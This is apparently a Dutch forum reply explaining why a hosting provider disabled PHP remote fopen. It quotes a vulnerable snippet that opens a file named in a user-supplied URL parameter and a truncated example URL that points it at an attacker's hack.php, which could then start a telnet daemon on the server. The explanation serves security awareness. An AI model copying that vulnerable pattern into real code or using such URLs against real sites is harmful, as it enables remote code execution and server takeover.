Eduard Bekker wrote:
>>Dit had inderdaad te maken met de include, het komt nogal eens voor dat
>>iemand een bestandje van buitenaf probeert te publiseren via een site op de
>>server en vervolgens een hack uitvoerd.
Dit lijkt te wijzen op het stopzetten van 'remote fopen', wat inderdaad
nogal eens tot beveiligingslekken kan leiden. Vooral in dit specifieke
geval dat nogal eens voorkomt:
<?
fopen($_GET["page"]);
?>
Een hacker kan door middel van de url
http://yoursite.invalid/index.php?pa...valid/hack.php
dan zijn eigen php scriptje laten uitvoeren op de server. Dit scriptje kan
vervolgens van alles doen, zoals bijvoorbeeld een eigen telnet daemon
uploaden en starten.
Michiel.

Likes:

Quote